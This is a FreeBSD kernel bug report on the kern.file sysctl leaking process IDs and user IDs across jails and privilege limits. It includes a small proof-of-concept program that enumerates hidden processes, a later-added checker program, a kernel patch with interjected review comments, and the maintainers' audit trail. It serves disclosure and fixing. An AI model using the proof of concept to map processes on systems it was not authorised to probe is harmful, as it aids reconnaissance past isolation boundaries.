From nick@milla.ask33.net  Tue Jul  8 02:46:37 2003
Return-Path: <nick@milla.ask33.net>
Received: from mx1.FreeBSD.org (mx1.freebsd.org [216.136.204.125])
	by hub.freebsd.org (Postfix) with ESMTP
	id 779DE37B404; Tue,  8 Jul 2003 02:46:37 -0700 (PDT)
Received: from milla.ask33.net (milla.ask33.net [217.197.166.60])
	by mx1.FreeBSD.org (Postfix) with ESMTP
	id A669F43FA3; Tue,  8 Jul 2003 02:46:36 -0700 (PDT)
	(envelope-from nick@milla.ask33.net)
Received: by milla.ask33.net (Postfix, from userid 1001)
	id E023E3ABB4D; Tue,  8 Jul 2003 11:51:29 +0200 (CEST)
Message-Id: <20030708095129.E023E3ABB4D@milla.ask33.net>
Date: Tue,  8 Jul 2003 11:51:29 +0200 (CEST)
From: Pawel Jakub Dawidek <nick@garage.freebsd.pl>
Reply-To: Pawel Jakub Dawidek <nick@garage.freebsd.pl>
To: FreeBSD-gnats-submit@freebsd.org
Cc: rwatson@freebsd.org
Subject: Seeing other uid with kern.file sysctl.
X-Send-Pr-Version: 3.113
X-GNATS-Notify:

>Number:         54211
>Category:       kern
>Synopsis:       Seeing other uid with kern.file sysctl.
>Confidential:   no
>Severity:       serious
>Priority:       medium
>Responsible:    rwatson
>State:          closed
>Quarter:        
>Keywords:       
>Date-Required:  
>Class:          sw-bug
>Submitter-Id:   current-users
>Arrival-Date:   Tue Jul 08 02:50:16 PDT 2003
>Closed-Date:    Mon Aug 14 14:14:02 GMT 2006
>Last-Modified:  Mon Aug 14 14:14:02 GMT 2006
>Originator:     Pawel Jakub Dawidek
>Release:        FreeBSD 5.1-CURRENT i386
>Organization:
>Environment:
System: FreeBSD czort.hell.none 5.1-CURRENT FreeBSD 5.1-CURRENT #6: Mon Jul 7 18:59:08 CEST 2003 root@czort.hell.none:/usr/obj/usr/src/sys/CZORT i386
>Description:
	There is a way to get the PIDs and UIDs of almost every running process,
	even if we are in a jail or are an unprivileged user, but
	security.bsd.see_other_uids is set to 1. The only condition is that the
	process has to have open files. We could use for this the sysctl
	kern.file, which doesn't check if the calling process could see the other
	process. This bug doesn't seem to exist in FreeBSD 4.x, because the
	credentials and PID of the process aren't exported to userland, and in
	5.x they are, via the xfile struct.

>How-To-Repeat:
	Here is a little program which shows how to use it.
	It should be run as follows:
	# gcc -Wall -o xfilehack xfilehack.c
	# jail / temp 127.0.0.1 `pwd`/xfilehack | uniq

        ---[ start of xfilehack.c ]---
#include <stdio.h>
#include <stdlib.h>
#include <sys/types.h>
#include <sys/sysctl.h>
#include <sys/file.h>
#include <libgen.h>
#include <string.h>
#include <errno.h>

int
main(int argc, char *argv[])
{
	struct xfile *files;
	const char *comm;
	size_t fsize = 0;
	int i;

	comm = basename(argv[0]);

	/* First call: ask the kernel how large the kern.file table is. */
	if (sysctlbyname("kern.file", NULL, &fsize, NULL, 0) != 0) {
		fprintf(stderr, "%s: %s\n", comm, strerror(errno));
		exit(EXIT_FAILURE);
	}
	files = malloc(fsize);
	if (files == NULL) {
		fprintf(stderr, "%s: %s\n", comm, strerror(ENOMEM));
		exit(EXIT_FAILURE);
	}
	/* Second call: fetch the array of struct xfile, one entry per open file. */
	if (sysctlbyname("kern.file", files, &fsize, NULL, 0) != 0) {
		fprintf(stderr, "%s: %s\n", comm, strerror(errno));
		exit(EXIT_FAILURE);
	}
	fsize /= sizeof(struct xfile);
	/* xf_pid and xf_uid are exported without any visibility check. */
	printf("PID\tEUID\n");
	for (i = 0; i < (int)fsize; ++i)
		printf("%d\t%u\n", (int)files[i].xf_pid, (unsigned)files[i].xf_uid);

	exit(EXIT_SUCCESS);
}
        ---[ end of xfilehack.c ]---
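To check on a given system whether kern.file still exports descriptors of processes the caller is not allowed to see, the following program (an added example, not part of the PR or of FreeBSD's own source) compares the PIDs returned by kern.file with those from kern.proc.all, which does apply the caller's visibility test; run it as an unprivileged user or inside a jail with security.bsd.see_other_uids set to 0. The sysctl access is FreeBSD-only and guarded by #ifdef __FreeBSD__; the comparison itself is portable C.

```c
/* Added example, not part of the PR: any kern.file entry whose pid is absent
 * from kern.proc.all (which applies cr_cansee) belongs to a hidden process. */
#include <stdio.h>
#include <stdlib.h>
/* Number of entries in seen[0..n) whose pid does not occur in visible[0..m). */
size_t
leaked_entries(const int *seen, size_t n, const int *visible, size_t m)
{
	size_t i, j, leaked = 0;
	for (i = 0; i < n; i++) {
		for (j = 0; j < m && visible[j] != seen[i]; j++)
			continue;
		leaked += (j == m);	/* ran off the end: no visible process owns it */
	}
	return (leaked);
}
#ifdef __FreeBSD__
#include <sys/param.h>
#include <sys/sysctl.h>
#include <sys/file.h>
#include <sys/user.h>
#include <err.h>
/* Fetch a variable-size sysctl into a malloc'd buffer; *len gets its size. */
static void *
fetch(const char *name, size_t *len)
{
	void *buf;
	if (sysctlbyname(name, NULL, len, NULL, 0) != 0)
		err(1, "%s", name);
	*len += *len / 8;	/* slack: the table may grow between the two calls */
	if ((buf = malloc(*len)) == NULL || sysctlbyname(name, buf, len, NULL, 0))
		err(1, "%s", name);
	return (buf);
}
int
main(void)
{
	size_t flen, plen, i, n;
	struct xfile *xf = fetch("kern.file", &flen);
	struct kinfo_proc *kp = fetch("kern.proc.all", &plen);
	size_t nf = flen / sizeof(*xf), np = plen / sizeof(*kp);
	int *fpid = calloc(nf, sizeof(int)), *ppid = calloc(np, sizeof(int));
	for (i = 0; i < nf; i++) fpid[i] = xf[i].xf_pid;
	for (i = 0; i < np; i++) ppid[i] = kp[i].ki_pid;
	n = leaked_entries(fpid, nf, ppid, np);
	printf("%zu open file(s) belong to processes hidden by kern.proc.all\n", n);
	return (n != 0);
}
#endif
```

A non-zero exit status means the leak is still present on that kernel.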

>Fix:
        This patch fixes the problem:

diff -ur /usr/src/sys/kern/kern_descrip.c src/sys/kern/kern_descrip.c
--- /usr/src/sys/kern/kern_descrip.c	Mon Jul  7 22:11:49 2003
+++ src/sys/kern/kern_descrip.c	Tue Jul  8 02:26:16 2003
@@ -2284,6 +2284,8 @@
 		n = 16;		/* A slight overestimate. */
 		sx_slock(&filelist_lock);
 		LIST_FOREACH(fp, &filehead, f_list) {
+			if (cr_cansee(req->td->td_ucred, fp->f_cred) != 0)
+				continue;
 			/*
 			 * We should grab the lock, but this is an
 			 * estimate, so does it really matter?
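Review bot: the filter added in this size-estimate loop keys on fp->f_cred, the credential the file was opened under, whereas the export loop in the next hunk tests p->p_ucred of the process holding the descriptor; for a descriptor inherited by or passed to a process with different credentials the two tests can disagree, so the size reported on the NULL-buffer probe may not match what is later exported. Since n only starts as `n = 16; /* A slight overestimate. */`, an undercount here would make the caller's second sysctlbyname() call fail with ENOMEM; either apply the same credential test in both loops or leave the estimate unfiltered, which is what the audit trail below says the committed version (kern_descrip.c:1.210) does.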
@@ -2301,6 +2303,10 @@
 	sx_slock(&allproc_lock);
 	LIST_FOREACH(p, &allproc, p_list) {
 		PROC_LOCK(p);
+		if (cr_cansee(req->td->td_ucred, p->p_ucred) != 0) {
+			PROC_UNLOCK(p);
+			continue;
+		}
 		xf.xf_pid = p->p_pid;
 		xf.xf_uid = p->p_ucred->cr_uid;
 		PROC_UNLOCK(p);
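Review bot: the lock handling here is correct: the cr_cansee() test runs under PROC_LOCK(p) and the skip path calls PROC_UNLOCK(p) before `continue`, so no process is left locked. Note that because the test compares against p->p_ucred, visibility is decided per owning process rather than per descriptor: a file held by two processes with different credentials is reported under the one the caller may see and hidden under the other, which matches see_other_uids semantics but leaves any descriptor-based filtering (the "nature of the descriptor" mentioned in the audit trail) still to be done.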
>Release-Note:
>Audit-Trail:
Responsible-Changed-From-To: freebsd-bugs->rwatson 
Responsible-Changed-By: rwatson 
Responsible-Changed-When: Fri Jul 25 12:51:47 PDT 2003 
Responsible-Changed-Why:  
Claim ownership of this PR since I sometimes have my fingers in 
the jail pot. 


http://www.freebsd.org/cgi/query-pr.cgi?pr=54211 
State-Changed-From-To: open->suspended 
State-Changed-By: rwatson 
State-Changed-When: Mon Jul 28 09:02:51 PDT 2003 
State-Changed-Why:  
kern_descrip.c:1.210 commits a thread->proc visibility test to the 
information export part of kern.file.  For now, we'll leave an 
information leak in the calculation of #descriptors to size the 
user array for (similar to information leaked via kern.openfiles), 
and not do tests based on the nature of the descriptor, just the 
owner of the descriptor.  Placed in suspended since we'll want to 
revisit this as we clamp down on more aspects of file descriptor 
operation. 


http://www.freebsd.org/cgi/query-pr.cgi?pr=54211 
State-Changed-From-To: suspended->closed 
State-Changed-By: rwatson 
State-Changed-When: Mon Aug 14 14:12:48 UTC 2006 
State-Changed-Why:  
Close this PR -- after adequate contemplation, the number of open file 
descriptors in the system is not something where the benefits outweigh 
the costs of protection. 


http://www.freebsd.org/cgi/query-pr.cgi?pr=54211 
>Unformatted:
